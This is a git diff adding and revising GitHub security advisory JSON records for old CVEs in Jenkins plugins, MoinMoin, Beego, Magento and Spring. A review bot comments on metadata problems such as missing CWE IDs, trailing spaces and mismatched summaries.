"introduced": "0" + }, + { + "last_affected": "0.6.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10277" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1085" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:09:20Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file 
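Review bot: The `summary` of the new GHSA-gvhp-v4m2-3rwf ends with a trailing space, `"Jenkins StarTeam Plugin stores credentials in plain text "`, which will be rendered and indexed verbatim; trim it to `"Jenkins StarTeam Plugin stores credentials in plain text"`. The same trailing space appears in the `summary` of GHSA-gxh5-r8gp-pjc3 later in this change. A schema or lint check that rejects leading/trailing whitespace in `summary` would stop this recurring.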
diff --git a/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json b/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json new file mode 100644 index 0000000000000..d31fd69c5bcd7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw8g-hh47-q4gw", + "modified": "2024-01-30T23:17:25Z", + "published": "2022-05-14T03:45:23Z", + "aliases": [ + "CVE-2017-1000389" + ], + "summary": "Cross-Site Request Forgery (CSRF) vulnerability in Jenkins global-build-stats plugin", + "details": "Some URLs provided by Jenkins global-build-stats plugin version 1.4 and earlier returned a JSON response that contained request parameters. These responses had the Content Type: text/html, so could have been interpreted as HTML by clients, resulting in a potential reflected cross-site scripting vulnerability. Additionally, some URLs provided by global-build-stats plugin that modify data did not require POST requests to be sent, resulting in a potential cross-site request forgery vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:global-build-stats" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000389" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-10-23/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:25Z", + "nvd_published_at": "2018-01-26T02:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json b/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json index 5a85be0ddf4c4..029d31006378a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json 
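Review bot: `cwe_ids` in the new GHSA-gw8g-hh47-q4gw lists only `CWE-79`, yet the `summary` names the issue as CSRF and the `details` describe two distinct problems, a reflected XSS via `text/html` JSON responses and state-changing URLs that accept non-POST requests. Adding `"CWE-352"` alongside `"CWE-79"` would make the classification match the text; alternatively the summary should be reworded so it does not lead with CSRF while the CWE says XSS. The CVSS vector (`UI:R`, `S:C`, `C:L/I:L`) reads as the XSS half, so the mismatch is between summary and CWE rather than the score.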
+++ b/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json @@ -52,6 +52,14 @@ "type": "WEB", "url": "https://framework.zend.com/changelog/2.3.6" }, + { + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-03" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-1786.yaml" + }, { "type": "WEB", "url": "https://github.com/zendframework/zf-web/blob/f97fe5c3cf6c51df7502237c6342511802c8df22/module/Security/view/security/advisory/ZF2015-03.phtml" diff --git a/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json b/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json new file mode 100644 index 0000000000000..5b116b69c1a16 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwxm-wqpq-w539", + "modified": "2024-01-30T22:35:37Z", + "published": "2022-05-14T03:18:39Z", + "aliases": [ + "CVE-2018-1000176" + ], + "summary": "Jenkins Email Extension Plugin showed plain text SMTP password in configuration form field", + "details": "An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:email-ext" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.62" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.61" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000176" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-04-16/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:35:37Z", + "nvd_published_at": "2018-05-08T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json b/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json new file mode 100644 index 0000000000000..18e9d690bd177 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json 
@@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxh5-r8gp-pjc3", + "modified": "2024-02-08T15:42:32Z", + "published": "2022-05-17T05:49:23Z", + "aliases": [ + "CVE-2010-2970" + ], + "summary": "MoinMoin cross-site scripting (XSS) vulnerability ", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2970" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moinwiki/moin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140801154518/http://secunia.com/advisories/40836" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228150629/http://www.securityfocus.com/bid/40549" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/4fe9951788cb" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinRelease1.9" + }, + { + "type": "WEB", + "url": 
"http://moinmo.in/SecurityFixes" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2083" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:42:32Z", + "nvd_published_at": "2010-08-05T13:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json b/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json index 4ab103558a6e5..e673017951e41 100644 --- a/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json +++ b/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7929" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7929.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121011306/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33" diff --git a/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json b/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json new file mode 100644 index 0000000000000..ebd188bd67359 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5hm-73hg-frrm", + "modified": "2024-01-30T22:11:46Z", + "published": "2022-05-14T02:56:39Z", + "aliases": [ + "CVE-2018-1999034" + ], + "summary": "Jenkins Inedo ProGet Plugin globally and unconditionally disabled SSL/TLS certificate validation", + "details": "A man in the middle vulnerability exists in Jenkins Inedo ProGet Plugin 0.8 and earlier in ProGetApi.java, ProGetConfig.java, ProGetConfiguration.java that allows attackers to impersonate any service that Jenkins connects to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.inedo.proget:inedo-proget" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999034" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-933" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:46Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json b/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json new file mode 100644 index 0000000000000..6648d7036f367 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7rx-r733-7x7r", + "modified": "2024-01-30T22:44:02Z", + "published": "2022-05-13T01:40:57Z", + "aliases": [ + "CVE-2017-1000107" + ], + "summary": "Sandbox bypass in Jenkins Script Security Plugin sandbox bypass", + "details": "Script Security Plugin did not apply sandboxing restrictions to constructor invocations via positional arguments list, super constructor invocations, method references, and type coercion expressions. This could be used to invoke arbitrary constructors and methods, bypassing sandbox protection.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:script-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.31" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.30" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000107" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:44:02Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json b/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json new file mode 100644 index 0000000000000..8c087fb1c19f6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json 
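Review bot: The new GHSA-h7rx-r733-7x7r ships with an empty `"cwe_ids": [ ]`, unlike every other new advisory in this change, so a sandbox-bypass issue rated `HIGH` has no weakness classification for filtering or reporting; a protection-mechanism-failure class entry such as `"CWE-693"` is the usual fit, but any accurate CWE is better than none. The `summary` also repeats itself, `"Sandbox bypass in Jenkins Script Security Plugin sandbox bypass"`; `"Sandbox bypass in Jenkins Script Security Plugin"` says the same thing once.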
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hf4p-4j9r-3cvx", + "modified": "2024-02-01T21:16:11Z", + "published": "2022-05-24T22:00:36Z", + "aliases": [ + "CVE-2019-16355" + ], + "summary": "Incorrect Default Permissions in Beego", + "details": "The File Session Manager in Beego before 1.12.2 allows local users to read session files because of weak permissions for individual files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/beego/beego" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16355" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/issues/3763" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/pull/3975" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/pull/3975/commits/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:16:11Z", + "nvd_published_at": "2019-09-16T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json b/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json index 4dd18d8523e98..70a80bcf6b5a8 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json +++ b/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-beans" }, "ranges": [ { 
@@ -40,7 +40,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-beans" }, "ranges": [ { @@ -62,6 +62,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22970" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583" + }, { "type": "PACKAGE", "url": "https://github.com/spring-projects/spring-framework" diff --git a/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json b/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json index c682903d9bd04..f972bcd0bf9d0 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json +++ b/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json @@ -52,6 +52,10 @@ "type": "PACKAGE", "url": "https://github.com/ADOdb/ADOdb" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/adodb/adodb-php/CVE-2016-4855.yaml" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201701-59" diff --git a/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json b/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json index 19e3412a8c121..d15384850cfee 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json +++ b/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json 
@@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8118" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8118.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json b/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json index c36e5b99f44cc..34eab8a9fe29f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json +++ b/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json @@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7913" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7913.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json b/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json index 1a423aa993ef0..4b166bd5276f6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json +++ b/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json 
@@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7928" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7928.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json b/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json new file mode 100644 index 0000000000000..8d1ec0000ab9a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrr3-7r5v-vxx5", + "modified": "2024-01-30T22:11:35Z", + "published": "2022-05-14T02:56:40Z", + "aliases": [ + "CVE-2018-1999035" + ], + "summary": "Jenkins Inedo BuildMaster Plugin globally and unconditionally disabled SSL/TLS certificate validation", + "details": "A man in the middle vulnerability exists in Jenkins Inedo BuildMaster Plugin 1.3 and earlier in BuildMasterConfiguration.java, BuildMasterConfig.java, BuildMasterApi.java that allows attackers to impersonate any service that Jenkins connects to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.inedo.buildmaster:inedo-buildmaster" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999035" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-935" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:35Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json b/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json index 5780000065eb0..8fe69c9f67000 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json +++ b/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json 
@@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7923" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7923.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json b/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json new file mode 100644 index 0000000000000..4e8b2057cca3d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw83-jpxr-g225", + "modified": "2024-01-30T22:25:07Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003022" + ], + "summary": "Jenkins Monitoring Plugin vulnerable to Denial of service vulnerability", + "details": "A denial of service vulnerability exists in Jenkins Monitoring Plugin 1.74.0 and earlier in PluginImpl.java that allows attackers to kill threads running on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:monitoring" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.75.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.74.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003022" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1153" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:25:07Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json b/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json new file mode 100644 index 0000000000000..45e4c82848401 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json 
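Review bot: The summary `Jenkins Monitoring Plugin vulnerable to Denial of service vulnerability` is tautological and hides the vector the rest of the record implies: CWE-352 together with a PR:N/UI:R vector describes a cross-site request forgery whose effect is killing threads, not a plain DoS. Suggest `"summary": "CSRF vulnerability in Jenkins Monitoring Plugin allows killing threads on the master"` and a matching clause in details (`... did not require POST for the thread-kill endpoint, resulting in a CSRF vulnerability ...`), if SECURITY-1153 confirms that is the mechanism. As written, anyone filtering advisories by CSRF misses this one.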
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2h6-j34w-g5vp", + "modified": "2024-01-30T22:40:52Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000013" + ], + "summary": "CSRF vulnerability in Jenkins Release plugin", + "details": "Jenkins Release Plugin 2.9 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to trigger release builds.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:release" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000013" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102834" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:40:52Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json b/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json index 6adaf942320c1..6cdbdcb05c37a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json +++ b/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j5jh-hpr4-h332", - "modified": "2023-08-02T21:06:13Z", + "modified": "2024-02-08T19:16:23Z", "published": "2022-05-14T02:47:28Z", "aliases": [ "CVE-2015-8124" 
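Review bot: `database_specific.last_known_affected_version_range` is missing here although the other Jenkins records added in this batch carry it (`<= 2.9` per the details), and the bare `http://www.securityfocus.com/bid/102834` reference points at a site that no longer serves BID pages — sibling records use a `web.archive.org` capture. The C:H and A:H components of the vector are not explained by details that only describe triggering release builds; if the analyst had a reason (release builds publishing artifacts, say), a clause in details would justify the HIGH rating.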
